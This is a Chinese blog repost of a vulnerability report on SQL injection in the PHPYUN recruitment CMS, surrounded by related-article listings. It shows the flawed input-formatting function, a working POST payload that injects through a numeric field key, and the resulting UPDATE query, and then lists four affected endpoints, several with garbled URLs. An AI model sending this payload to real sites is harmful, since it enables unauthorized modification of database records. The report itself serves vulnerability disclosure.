php注入指定字段,PHPYUN最新版Webscan绕过注入四处(可修改任意字段值)

最新推荐文章于 2024-05-07 08:00:00 发布
最新推荐文章于 2024-05-07 08:00:00 发布
阅读量102 收藏
点赞数
文章标签: php注入指定字段

### 简要描述:

PHPYUN最新版Webscan绕过注入四处(可修改任意字段值)

### 详细说明:

漏洞参考:

[WooYun: PHPYUN最新版Webscan绕过注入四处(可遍历全站信息,无需登录)](http://www.wooyun.org/bugs/wooyun-2015-0126835)

看看 站点是怎么修补的:

```

function FormatValues($Values){

$ValuesStr='';

foreach($Values as $k=>$v){

if(preg_match("/^[a-zA-Z0-9_]+$/",$k))

{

if(preg_match('/^[0-9]+$/', $k)){

$ValuesStr.=','.$v;

}else{

$ValuesStr.=',`'.$k.'`=\''.$v.'\'';

}

}

}

return substr($ValuesStr,1);

}

```

修补方案就是,设计缺陷为:

1.preg_match("/^[a-zA-Z0-9_]+$/",$k) 让这个成立

2. if(preg_match('/^[0-9]+$/', $k)){

$ValuesStr.=','.$v;

当key 为纯数字组成的时候,直接连接后面的值 这个就存在很大的风险了

发布一个微简历

[1.png](https://images.seebug.org/upload/201508/201421383889c6511300249c7fb7ca8bbe4c8db3.png)

我的简历密码是admin

然后记住这个id

[2.png](https://images.seebug.org/upload/201508/201422177426b8db3f28d3f0de862f76ce5a1a48.png)

访问url:

http://localhost/phpyun/tiny/index.php?admin_dir=admin

postdata:

username=test123&sex=7&exp=18&job=ccc&mobile=15802991419&qq=11111111&123455=`qq`%3d@@VERSION where `id`=1%23&password=admin&authcode=ag31&id=1&submit=%B7%A2%B2%BC

抓取的sql语句为:

UPDATE `phpyun_resume_tiny` SET `username`='test123',`sex`='7',`exp`='18',`job`='ccc',`mobile`='15802991419',`qq`='11111111',`qq`=@@VERSION where `id`=1#,`status`='1',`login_ip`='',`time`='1440051620' WHERE 1 and `id`='1'

查看这个简历:

[3.png](https://images.seebug.org/upload/201508/2014233322ff8e4b373f0fad8f8891ac8e81ce9c.png)

其他漏洞点原理一模一样,都可以修改任意字段

1.http://localhost/phpyun40https://images.seebug.org/upload/tiny/index.php?admin_dir=admin

2.http://localhost/phpyun40https://images.seebug.org/upload/index.php?admin_dir=admin&c=index&m=friend&a=saveinfo

3.http://localhost/phpyun40https://images.seebug.org/upload/index.php?admin_dir=admin&c=once&m=wap&a=add

4.http://localhost/phpyun40https://images.seebug.org/upload/index.php?admin_dir=admin&c=once&m=wap&a=add

原理参考最上面的链接就好

### 漏洞证明:

loading-bars.svg

h肚肚
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpyun-存有逻辑漏洞验证码泄露的源码包.zip
03-16
phpyun-存有逻辑漏洞验证码泄露的源码包,亲测真实有效可靠,如有侵权,请联系CSDN管理员删除即可
动态批量修改任意任意字段
森林木的博客
01-16 200
货铺QQ群号:834508274 微信群不能扫码进了,可以加我微信SAPliumeng拉进群,申请时请提供您哪个模块顾问,否则是一律不通过的。 进群统一修改群名片,例如BJ_ABAP_森林木。群内禁止发广告及其他一切无关链接,小程序等,进群看公告,谢谢配合 不修改昵称会被不定期踢除,谢谢配合 先提下这个需求。 是因为copy测试系统来着,导致有些东西没改过来。 本来想着就几个表的几个字...
逻辑漏洞:验证码相关的逻辑漏洞
最新发布
qq_68163788的博客
05-07 966
验证码可能被恶意窃取或篡改,导致安全性受到威胁;验证码可能被恶意利用,例如通过社会工程学手段诱使用户提供验证码,从而实施诈骗或盗取个人信息;验证码的生成算法可能存在弱点,被攻击者破解从而生成有效验证码;验证码的有效期设置不当或者重复使用,也可能被攻击者利用。综上所述,验证码相关的逻辑漏洞可能会给用户带来安全风险,因此在设计和使用验证码时应当注意以上问题,加强安全性措施以保护用户信息安全。
phpyun显示自定义企业会员分类字段"驾照要求(job_driverLicense)"
ycs_0405的专栏
04-19 254
假设在后台添加了一个企业会员分类字段 “驾照要求(job_driverLicense)”,前台显示字段job_driverLicense的内容。 方法: 在文件“/app/model/job.model.php”中,在方法getInfoArray()中,添加以下代码: $jobInfo['job_driverLicense'] = $cache['comclas...
php 越权 漏洞,PHPYUN最新版SQL注入及多处越权操作终结篇
weixin_35098081的博客
03-10 769
### 简要描述:PHPYUN最新版(phpyun_v3.1.0604_gbk)SQL注入及多处越权操作虽然PHPYUN注入防御上已经做得很不错了,方的很严格,像吃掉引号,宽字节的基本上很少了,但是不需要跟引号斗争的地方还有很多,得好好检查,好好修复了!!!越权方面做的也很不错了,有些是因为SQL注入引起,有些是你们忘了加thins->uid的限制,这里再来一处前台SQL注入及多处越权操作...
PHPYun XML 注入漏洞
whatiwhere的博客
12-06 1708
实验环境 实验环境 操作机系统:WindowsXP 目标网站:www.test.ichunqiu 实验目的 掌握本次漏洞的原理及其利用方法 学会如何修复Sql注入漏洞 实验工具 Hack Bar :它是火狐浏览器的一款插件,包含一些常用的工具。(SQL injection,XSS,加密等),web开发人员可以利用它,快速构建一个http请求,或者用它快速实现某种算法等,本次实验主要用到它的...
PHP云人才系统(phpyun) v4.2 Beta版 build160809
12-05
PHP云人才系统是一个采用 PHP 和 MySQL 数据库构建的高效开源的人才与企业求职招、聘解决方案,在尊重版权的前提下能极大的满足对于网站程序进行二次开发。PHP云人才系统作为一款拥有自主知识产权的中文人才运营系统...
PHP云人才系统(phpyun)最新官方版
04-02
PHP云人才系统(phpyun)最新官方版v3.0 beta build131010,PHP云人才系统是一个采用 PHP 和 MySQL 数据库构建的高效开源的人才与企业求职招、聘解决方案,在尊重版权的前提下能极大的满足站长对于网站程序进行二次...
PHP云人才系统(phpyun) v4.2 Beta版 build160913
01-02
PHP云人才系统是一个采用 PHP 和 MySQL 数据库构建的高效开源的人才与企业求职招、聘解决方案,在尊重版权的前提下能极大的满足对于网站程序进行二次开发。PHP云人才系统作为一款拥有自主知识产权的中文人才运营系统...
PHP云人才系统(phpyun) v4.1 Beta版 build160223
12-07
PHP云人才系统是一个采用 PHP 和 MySQL 数据库构建的高效开源的人才与企业求职招、聘解决方案,在尊重版权的前提下能极大的满足对于网站程序进行二次开发。PHP云人才系统作为一款拥有自主知识产权的中文人才运营系统...
PHP云人才系统(phpyun) v4.2 Beta版 build160802
12-05
PHP云人才系统是一个采用 PHP 和 MySQL 数据库构建的高效开源的人才与企业求职招、聘解决方案,在尊重版权的前提下能极大的满足对于网站程序进行二次开发。PHP云人才系统作为一款拥有自主知识产权的中文人才运营系统...
米安代码审计 06 PHPYUN V3.0 任意文件上传漏洞
kevinhanser
07-24 595
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 web环境: phpstudy apache+php5.2 程序版本:phpyun3.0  2013-11-02 2. 测试 首先注册一个会员 然后访问 http://192.168.171.128/member/inde...
PHP网站漏洞poc,phpyun某处SQL注入漏洞含POC
weixin_32112607的博客
04-02 262
### 简要描述:20141231### 详细说明:phpyun使用了360和一个自身的防护脚本我们来看看过滤情况[](https://images.seebug.org/upload/201501/16102451cf1b07dca7d416cab0d4fd1ed863c6ab.png)这都是我们常用查询语句。出现这些语句就会结束,以及替换。不过这里有个安全隐患就是[](https://imag...
phpyun 两处任意用户密码漏洞
_404root的博客
02-28 1663
您正在找回密码的账号为:xi***yu,请选择重置密码方式: 选择密保邮箱 9158*******com 选择绑定手机号 141*****241 若您无法使用上述方法找回,请联系客服400-880-5523
php 越权 漏洞,PHPYUN最新版多处SQL注入及越权操作二
weixin_39624769的博客
03-10 221
### 简要描述:PHPYUN最新版(phpyun_v3.1.0604_gbk)多处SQL注入及越权操作虽然PHPYUN注入防御上已经做得很不错了,方的很严格,像吃掉引号,宽字节的基本上很少了,但是不需要跟引号斗争的地方还有很多,得好好检查,好好修复了!!!这里再来三处SQL注入及越权操作!!!### 详细说明:文件/member/model/com.class.php第一处SQL注入、越权修改...
getshell.php,PHPYUN设计缺陷导致轻易Getshell
weixin_29144259的博客
04-08 219
### 简要描述:PHPYUN设计缺陷导致轻易Getshell### 详细说明:#1 设计缺陷phpyun集成了部分ucenter功能,引入了UC_KEY,且默认设置为"phpyun123456"```define("UC_KEY","phpyun123456");```你们难道不知道UC_KEY这个的威力的多大?好吧 我就当你们不知道,详情请见```[WooYun: Discuz的利用UC_K...
php100漏洞,phpyun人才管理系统V5.0 SQL注入漏洞分析
weixin_39636707的博客
03-11 752
*世界上最愚蠢的事莫过于我们无比狂热地做一件事,到最后却不知道为什么要做*cms背景介绍PHP云人才管理系统(phpyun)是国内主流人才管理CMS系统之一!PHP云专为中文用户设计和开发,采用:B/S+c/s技术框架,程序源代码100%完全开放!基于PHP 和 MySQL 数据库构建的为核心开发。漏洞类型前台SQL盲注漏洞描述Phpyun最新版本V5.0中,在用户邮箱认证处,存在SQL延时注入。...
php任意文件删除漏洞,phpyun二次任意文件删除漏洞
weixin_42513870的博客
04-02 180
### 简要描述:只要有任意文件删除 这系统绝对崩。我吐个槽,最新的过滤文件实在是太BT了,只要有select and .... 就die()伤不起啊### 详细说明:问题出在 friend\model\index.class.php[](https://images.seebug.org/upload/201401/0119250873aadf723cab3eb6a38f52ad7625c...
PHP 远程代码执行漏洞复现CVE-2019-11043
热门推荐
wo41ge的博客
02-05 1万+
漏洞名称 PHP 远程代码执行漏洞复现CVE-2019-11043 准备工作:安装 docker sudo apt-get install docker docker-compose 我这边已经安装过了 查看一下docker的版本 安装golang 环境 sudo apt install golang 搭建漏洞环境 git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043 docker-compose up -d
phpyun人才招聘系统小程序前端源码for_v4.61版可兼容授权版和vip版
10-01
phpyun人才招聘系统小程序前端源码for_v4.61版可兼容授权版和VIP版。这意味着该前端源码可以与phpyun人才招聘系统的4.61版本中的授权版和VIP版进行兼容。 phpyun人才招聘系统小程序前端源码是一种用于构建人才招聘小程序的代码库。通过与phpyun人才招聘系统的授权版和VIP版进行兼容,用户可以在小程序中使用这些功能。授权版和VIP版通常包含更多的功能和特性,以提供更好的用户体验和更强大的招聘功能。 使用phpyun人才招聘系统小程序前端源码,用户可以自定义小程序的外观和交互方式,以满足不同需求。该源码提供了一套模板和组件,用户可以根据自己的需求进行修改和定制。同时,该源码还提供了与phpyun人才招聘系统后端的API接口,以实现与后端的数据交互和功能调用。 通过兼容授权版和VIP版,该前端源码能够充分发挥phpyun人才招聘系统的功能优势,为用户提供更多选择和灵活性。不论是在招聘企业还是求职者方面,用户都可以使用这个前端源码来构建一个功能丰富、易于使用的人才招聘小程序。 总结一下,phpyun人才招聘系统小程序前端源码for_v4.61版可兼容授权版和VIP版,意味着用户可以使用这个源码来构建一个与phpyun人才招聘系统4.61版本的授权版和VIP版兼容的人才招聘小程序。该源码提供了丰富的功能和灵活的定制选项,可以满足不同用户的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值